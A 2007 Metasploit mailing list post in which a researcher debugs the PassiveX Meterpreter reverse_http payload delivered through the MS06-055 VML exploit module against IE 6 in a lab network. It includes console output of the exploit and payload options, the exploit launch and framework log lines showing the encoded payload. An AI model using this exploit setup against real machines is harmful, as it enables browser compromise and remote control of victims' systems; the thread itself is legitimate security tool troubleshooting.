Metasploit mailing list archives
PassiveX-based payloads and MS06-055
From: buffer at softmedia.info (Angelo Dell'Aera)
Date: Tue, 13 Mar 2007 18:53:17 +0100
On Tue, 13 Mar 2007 09:42:32 -0700, mmiller at hick.org wrote:
> A few quick things to check:
>
> 1) What version of IE is installed on the machine? I'm assuming IE 6, but just need to be sure.
You're right... IE 6.
> 2) What happens when you manually bring up the PX site after the values have been successfully altered? In the previous example, you could try browsing to:
>
> http://192.168.33.130:10000//OPrZwdoVOupJ0PB4rCdiaWXi1wIB5e9s
>
> There might be some additional information you can collect by doing 'setg LogLevel 3' and then taking a look at ~/.msf3/logs/framework.log.
Following what you suggested...

msf exploit(ms06_055_vml_method) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.33.130   yes       The local host to listen on.
   SRVPORT  8080             yes       The local port to listen on.
   URIPATH  up               no        The URI to use for this exploit (default is random)

Payload options:

   Name       Current Setting                                Required  Description
   ----       ---------------                                --------  -----------
   DLL        /home/buffer/msf3/data/meterpreter/metsrv.dll  yes       The local path to the DLL to upload
   EXITFUNC   seh                                            yes       Exit technique: seh, thread, process
   PXAXCLSID  B3AC7307-FEAE-4e43-B2D6-161E68ABA838           yes       ActiveX CLSID
   PXAXDLL    /home/buffer/msf3/data/passivex/passivex.dll   yes       ActiveX DLL to inject
   PXAXVER    -1,-1,-1,-1                                    yes       ActiveX DLL Version
   PXHOST     192.168.33.130                                 yes       The local HTTP listener hostname
   PXPORT     8080                                           yes       The local HTTP listener port
   PXURI      /px                                            no        The URI root for requests

Exploit target:

   Id  Name
   --  ----
   0   Windows NT 4.0 -> Windows 2003 SP1

msf exploit(ms06_055_vml_method) > exploit
[*] PassiveX listener started.
[*] Using URL: http://192.168.33.130:8080/up
[*] Server started.
[*] Exploit running as background job.
msf exploit(ms06_055_vml_method) >
[*] Sending PassiveX main page to client
[*] Sending PassiveX main page to client

The second "Sending..." message was displayed when I tried directly browsing to http://192.168.33.130:8080/px, but it seems that still nothing happens at all. Looking at this behavior, it seems to me that the first stage gets executed and that the browser asks for the PXHOST even in the first case, but after this step nothing else happens.
These are the most significant lines in framework.log:

[03/13/2007 18:20:29] [d(2)] core: windows/meterpreter/reverse_http: Successfully encoded with encoder x86/shikata_ga_nai (size is 479)
[03/13/2007 18:20:29] [d(2)] core: PassiveX listener started on http://192.168.33.130:8080/px
[03/13/2007 18:20:41] [e(0)] rex: Failed to find handler for resource: /
[03/13/2007 18:20:47] [d(2)] core: windows/meterpreter/reverse_http: Successfully encoded with encoder x86/shikata_ga_nai (size is 479)
[03/13/2007 18:21:15] [e(0)] rex: Failed to find handler for resource: /

After looking at this last log message I even tried setting PXURI to / and to an empty string, but no results at all even in this case.

Regards,

--
Angelo Dell'Aera 'buffer'
Antifork Research, Inc.   http://buffer.antifork.org
Metro Olografix
PGP information in e-mail header
Current thread:
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 13)
- PassiveX-based payloads and MS06-055 mmiller at hick.org (Mar 13)
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 13)
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 13)
- PassiveX-based payloads and MS06-055 mmiller at hick.org (Mar 13)
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 14)
- PassiveX-based payloads and MS06-055 mmiller at hick.org (Mar 14)
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 16)
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 13)
- PassiveX-based payloads and MS06-055 mmiller at hick.org (Mar 13)